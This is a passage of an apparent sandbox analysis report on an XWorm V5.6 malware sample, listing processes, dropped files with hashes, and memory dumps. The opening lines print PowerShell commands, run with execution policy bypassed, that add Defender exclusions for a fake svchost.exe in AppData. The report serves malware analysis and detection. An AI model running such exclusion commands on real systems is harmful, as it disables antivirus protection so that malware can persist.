"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3928

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3148

C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe
"C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"
2⤵
- Executes dropped EXE
PID:4084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:2364

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4632

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d0c46cad6c0778401e21910bd6b56b70

SHA1
7be418951ea96326aca445b8dfe449b2bfa0dca6

SHA256
9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

SHA512
057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
60KB

MD5
0a9da256ffcfe42119c7a351e5eaaa9c

SHA1
c992b8e18cfc24faee739511beb5094189806177

SHA256
f4750e5af8c84626318382887c9c17e6555eff006af7d7e88cadd562ab2ee8ed

SHA512
451f4d470fe938a7c71d340f0711a9d1cb98f542138bd95584244471fa5f31beba8274699be1e497742ce91182dc9e308ca2d9ce3d004174a8228cca4c118672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
60KB

MD5
fb51937a2c2e01a3810898ef7ce1ec55

SHA1
a33374f5645efe76d424e46c41753a8d7fcacc05

SHA256
ca4af4a5185e3a796c219010ccc486eee3e3006658987dd7bba9e8b51a844910

SHA512
5e53331e90f93b728fafd73e5e0e9db8ad194165c411493fa41fc743fb917dd6b10c673f5706c7ab25ab940eaa1c615da5096b9ad9b156a9af774ea90bcc37ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
964db7116612e876f79203f05d17a40e

SHA1
a0393897892030df09914ebefc72a87fa0f9fed0

SHA256
4519e6895e42413cce54b04e8202fc8ad1a2681f4716ebfd3d0c694b36634f20

SHA512
a709412838883b60fe5d495b069e29f93a986459c87a2319f3a6f6efa205e8de76dcde2f28d74f9d6c13652191e6512253a8223a096add44793ac18d3db28143

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
20KB

MD5
2c87425d8a8ff9578c8dbbb5eea7f84d

SHA1
1daa0934a5373ddec112bc7fa609c0b726dad9c5

SHA256
668cd14af51b5f0ed0d34a2cd9a544e9991d7797dcc889f5415515f504f8fe3a

SHA512
89d9d229a56ddbc7d59e7b8a75ccff433e96a3c51a9ffdb97ba45c24d022fb7c7ef31364a970ccad002dc921f97d53878b56aea43c7ee00a4e67611dc619f384

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
21KB

MD5
3c2f6f715efef426dd929116243daa00

SHA1
326372a6f9811e61ae0e884a39197c04768b69ed

SHA256
3a85bb2ffe50cbf653836899885839153307b31082b96d7421728fddeee1c844

SHA512
2e01ea8422b5f2939a15d060995d4244830c455bfc413c96283525f4351f97b0e4005d1b8468765edcd789809e634c95104d7b712f5d5e5a0c35adee0bfb3daf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
85b0e7216c3ee0b1b2dbce1d938a637d

SHA1
8cdb53bce07d714169639554457586fcd44c35e5

SHA256
6bc3d2362918ddf70d1acce82b649510ef23c7a37bf69e91eb9931bd2c8d66fd

SHA512
c3b327bc396d8c533b69c9de539e5f5da03a98da0444a721eba2ac957570b7a940b0efb43dd10abce62ebef4f94450b8d52505767d15e7d1902b040cf12a7494

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
20KB

MD5
a72fb7ed7a425d9153afdfd0496f5548

SHA1
d15ae6787c0a1bba38a1319ff9bd782979627588

SHA256
60d433c7656176d40124a22e13a0d5d445bcfac15d8b8b7ebcbd90e4029b64fc

SHA512
4b51cbd105c03dd1d4238f519da5b2aa94f269ce1d436233514baf375545a52510329e94ae8d46769110174388a101138161d7e1e55440ae76a371df4f8a3ebe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
ba136a63e80ba9b98ec93810e8124fff

SHA1
68d047740fd72fbec7e295e60a310ebf41e1d011

SHA256
2a2aa9624802cda43e3328e6acfda1c4f5130ee12231b992c963a9dcd9734df3

SHA512
913c9d03003a99da05e84c469c5508b2d11b977a72ef8f95130d92965e657d7596e6b7951e41ff849e9abd0392f23c0f646c1e884611a1ed12386d748b7b1692

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
ed50d9dc8a7cbfd0fafa5fb9676c9be5

SHA1
ce54a5ba0ee4bba470bc85776650072786e8e6af

SHA256
724e79932743b454effcc8dd8637e92c7072f3533015cdb144530d9688b3c4af

SHA512
1c55b871b730fb9775dbd80e577cd5d1ff2e4c10ead02da5632f7d303ad0ef13edfbebfe57a51d535aff3e2e844909193b87de5fcc717bf2733cee555a2cc5c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
602e0192eaa8bce2c9634cefb8c28cba

SHA1
1e5719141e482c193ed4263fd941815323861a6e

SHA256
89101c740e9154223168cd89e3c491b2ea3aba8751e1fc8727f45162641b18b5

SHA512
43e2649c9d7a677f154727dbef693129c65c182260259ae6eab9054c13329f8472a2dd0aaea07830c17a2a519474ebd0bada9d7d24945acab8b4222d76174b85

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize
10KB

MD5
cf4d76f1a9247b679411a23597ab0736

SHA1
ca7ea2bb3f8f7be7c59eb122cad5b045cf4e9c66

SHA256
552fdfebf5efd5e7e3373b9030d26042a53a28197c2955a8dfa3eed3479c6bbe

SHA512
a21e03a0fb43eb2f50e2ee98e9eee1ffcda02f5e418352d567904c4ff33ca536c938f0cc46aa258bc6df37d34f05799bfc8c7d99a34afba789a2286ec1c47a91

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize
10KB

MD5
83704c7963de9f77ef9140f7c957c247

SHA1
7e084166afe58930cc1663a3db722b34754f9ecb

SHA256
2f164fbe6bd7e11a243602c6cda5488794e237f57401071b701e2e82f9062ac9

SHA512
1837f7d4e135c5a862d2875e9927085395a68e0cf16e3dd7cb556250ad9a478b22d2afb3050b0859f05a9aafd2c95e763d984d2f840dbfa343cc51598bd11019

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jalce3kg.vio.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe
Filesize
14.9MB

MD5
56ccb739926a725e78a7acf9af52c4bb

SHA1
5b01b90137871c3c8f0d04f510c4d56b23932cbc

SHA256
90f58865f265722ab007abb25074b3fc4916e927402552c6be17ef9afac96405

SHA512
2fee662bc4a1a36ce7328b23f991fa4a383b628839e403d6eb6a9533084b17699a6c939509867a86e803aafef2f9def98fa9305b576dad754aa7f599920c19a1

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_355.vbs
Filesize
115B

MD5
70b403a181560d83f2d80ea3484e29c1

SHA1
291d13a96daa841598ba5de12742db4cc0815b61

SHA256
dfa9045876e32f3b33ae4805170d808ecd0dedbecdd7e2bd425381b16193140d

SHA512
e546542bc751fccbbc4061628d371369b60a434926092e9be602d552c9bf87134da306a1df7394d83cdbe56d35b04c80bcdbddfc7cbab2f093e7251e6253b309

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_550.vbs
Filesize
115B

MD5
9d3f121ed15c982fbf1e2953a7f3807f

SHA1
d1b18ff062e105d4485429c666e3867723b57cc3

SHA256
d748da8ff8ecd09f891b2d1dc18cbad497f88a50de3cb8c1a9a1f095280c6a76

SHA512
3eb8d108363ccc2c8459b7dbd69de7de76bc8b11390eef1dcd3b82e8fcd08c2d8f97dab0ca8e11494b6e7cb153454e997de2716107755c59a657cf847c3524bf

Download Submit
C:\Users\Admin\AppData\Roaming\xfixer.bat
Filesize
304KB

MD5
28a668375e0d2b1cfa1d847fc44934d4

SHA1
bd0d7df2f07f879e97e02d13d9eebf0a584fabe7

SHA256
cc3de81425f13eba2412c152f843351307b3d7f3cb9bd2da3d577ec5e36f8160

SHA512
d35dd9fd930f84f5cf1b042c828b6d2adc3007ff0042153f5f7fd45f8539f4155df8b07f59fe488ab3a03f2af4f8067b56c7276b3c80d3554d02ed930470689c

Download Submit
C:\Users\Admin\AppData\Roaming\xworm.bat
Filesize
317KB

MD5
ada0b01d33911547bb0086e0ed152484

SHA1
ec81374c631f94c536b51dfb8c42c063bf72ca78

SHA256
aba89066a3bbc1addaaa48b4d209dac1e59138afb64c797bf950d286e8e826a1

SHA512
6aba80c863169fe3a244e20c6d9cfc13f8f69ff81a8402327603f46700a2798d19d1347f0c34e9301cac9aeec0ae5ae9adc76f571dddb9fdbfac6c23de3aae26

Download Submit
C:\Users\Admin\AppData\Roaming\xworm.bat.exe
Filesize
411KB

MD5
bc4535f575200446e698610c00e1483d

SHA1
78d990d776f078517696a2415375ac9ebdf5d49a

SHA256
88e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122

SHA512
a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717

Download Submit
memory/484-255-0x0000000008340000-0x000000000844A000-memory.dmp

Filesize
1.0MB

Download
memory/484-252-0x0000000008960000-0x0000000008F78000-memory.dmp

Filesize
6.1MB

Download
memory/484-254-0x0000000007AA0000-0x0000000007ADC000-memory.dmp

Filesize
240KB

Download
memory/484-253-0x0000000007A40000-0x0000000007A52000-memory.dmp

Filesize
72KB

Download
memory/484-251-0x00000000053E0000-0x00000000053FE000-memory.dmp

Filesize
120KB

Download
memory/744-84-0x0000000007430000-0x0000000007684000-memory.dmp

Filesize
2.3MB

Download
memory/908-169-0x0000000007D20000-0x0000000007D31000-memory.dmp

Filesize
68KB

Download
memory/908-151-0x0000000074050000-0x000000007409C000-memory.dmp

Filesize
304KB

Download
memory/908-168-0x00000000079B0000-0x0000000007A54000-memory.dmp

Filesize
656KB

Download
memory/1044-232-0x0000000074050000-0x000000007409C000-memory.dmp

Filesize
304KB

Download
memory/1924-110-0x0000000074050000-0x000000007409C000-memory.dmp

Filesize
304KB

Download
memory/1964-352-0x00000000742A0000-0x00000000745F7000-memory.dmp

Filesize
3.3MB

Download
memory/1964-259-0x00000000075E0000-0x000000000767C000-memory.dmp

Filesize
624KB

Download
memory/1964-351-0x0000000074050000-0x000000007409C000-memory.dmp

Filesize
304KB

Download
memory/1964-362-0x000000000BAF0000-0x000000000BB01000-memory.dmp

Filesize
68KB

Download
memory/1964-363-0x000000000BCA0000-0x000000000BCB5000-memory.dmp

Filesize
84KB

Download
memory/1964-361-0x000000000B9A0000-0x000000000BA44000-memory.dmp

Filesize
656KB

Download
memory/1964-341-0x0000000008240000-0x00000000082D2000-memory.dmp

Filesize
584KB

Download
memory/1964-342-0x0000000008210000-0x000000000821A000-memory.dmp

Filesize
40KB

Download
memory/1964-350-0x000000000AEB0000-0x000000000AEFA000-memory.dmp

Filesize
296KB

Download
memory/1964-348-0x000000000AD10000-0x000000000AD1E000-memory.dmp

Filesize
56KB

Download
memory/1964-340-0x0000000008770000-0x0000000008D16000-memory.dmp

Filesize
5.6MB

Download
memory/1964-258-0x0000000004F10000-0x0000000004F26000-memory.dmp

Filesize
88KB

Download
memory/1964-349-0x000000000AD70000-0x000000000AD92000-memory.dmp

Filesize
136KB

Download
memory/1964-346-0x0000000009DE0000-0x000000000A130000-memory.dmp

Filesize
3.3MB

Download
memory/1964-347-0x000000000AB70000-0x000000000AC8E000-memory.dmp

Filesize
1.1MB

Download
memory/2216-98-0x0000000007A70000-0x0000000007CC2000-memory.dmp

Filesize
2.3MB

Download
memory/2824-241-0x0000000074050000-0x000000007409C000-memory.dmp

Filesize
304KB

Download
memory/3148-329-0x0000000074050000-0x000000007409C000-memory.dmp

Filesize
304KB

Download
memory/3488-52-0x00000000069A0000-0x00000000069D4000-memory.dmp

Filesize
208KB

Download
memory/3488-26-0x0000000005330000-0x0000000005396000-memory.dmp

Filesize
408KB

Download
memory/3488-7-0x0000000000D30000-0x0000000000D66000-memory.dmp

Filesize
216KB

Download
memory/3488-97-0x0000000073770000-0x0000000073F21000-memory.dmp

Filesize
7.7MB

Download
memory/3488-86-0x0000000007050000-0x0000000007058000-memory.dmp

Filesize
32KB

Download
memory/3488-83-0x0000000007060000-0x000000000707A000-memory.dmp

Filesize
104KB

Download
memory/3488-82-0x0000000006F70000-0x0000000006F85000-memory.dmp

Filesize
84KB

Download
memory/3488-81-0x0000000006F60000-0x0000000006F6E000-memory.dmp

Filesize
56KB

Download
memory/3488-8-0x0000000073770000-0x0000000073F21000-memory.dmp

Filesize
7.7MB

Download
memory/3488-20-0x0000000073770000-0x0000000073F21000-memory.dmp

Filesize
7.7MB

Download
memory/3488-24-0x0000000004A40000-0x0000000004A62000-memory.dmp

Filesize
136KB

Download
memory/3488-27-0x00000000054A0000-0x0000000005506000-memory.dmp

Filesize
408KB

Download
memory/3488-70-0x0000000006F30000-0x0000000006F41000-memory.dmp

Filesize
68KB

Download
memory/3488-33-0x0000000005510000-0x0000000005867000-memory.dmp

Filesize
3.3MB

Download
memory/3488-69-0x0000000006FA0000-0x0000000007036000-memory.dmp

Filesize
600KB

Download
memory/3488-12-0x0000000004D00000-0x000000000532A000-memory.dmp

Filesize
6.2MB

Download
memory/3488-66-0x0000000006DA0000-0x0000000006DAA000-memory.dmp

Filesize
40KB

Download
memory/3488-64-0x0000000007390000-0x0000000007A0A000-memory.dmp

Filesize
6.5MB

Download
memory/3488-65-0x0000000006D30000-0x0000000006D4A000-memory.dmp

Filesize
104KB

Download
memory/3488-6-0x000000007377E000-0x000000007377F000-memory.dmp

Filesize
4KB

Download
memory/3488-63-0x0000000006C60000-0x0000000006D04000-memory.dmp

Filesize
656KB

Download
memory/3488-53-0x0000000074050000-0x000000007409C000-memory.dmp

Filesize
304KB

Download
memory/3488-62-0x0000000005FA0000-0x0000000005FBE000-memory.dmp

Filesize
120KB

Download
memory/3488-39-0x00000000059E0000-0x0000000005A2C000-memory.dmp

Filesize
304KB

Download
memory/3488-38-0x00000000059C0000-0x00000000059DE000-memory.dmp

Filesize
120KB

Download
memory/3928-310-0x0000000074050000-0x000000007409C000-memory.dmp

Filesize
304KB

Download
memory/4084-37-0x000002356D7D0000-0x000002356E6B8000-memory.dmp

Filesize
14.9MB

Download
memory/4084-25-0x00007FF836C73000-0x00007FF836C75000-memory.dmp

Filesize
8KB

Download
memory/4116-291-0x0000000074050000-0x000000007409C000-memory.dmp

Filesize
304KB

Download
memory/4216-119-0x0000000074050000-0x000000007409C000-memory.dmp

Filesize
304KB

Download
memory/4320-280-0x00000000074B0000-0x00000000074C5000-memory.dmp

Filesize
84KB

Download
memory/4320-279-0x0000000007420000-0x0000000007431000-memory.dmp

Filesize
68KB

Download
memory/4320-278-0x0000000007160000-0x0000000007204000-memory.dmp

Filesize
656KB

Download
memory/4320-269-0x0000000074050000-0x000000007409C000-memory.dmp

Filesize
304KB

Download
memory/4340-150-0x0000000074050000-0x000000007409C000-memory.dmp

Filesize
304KB

Download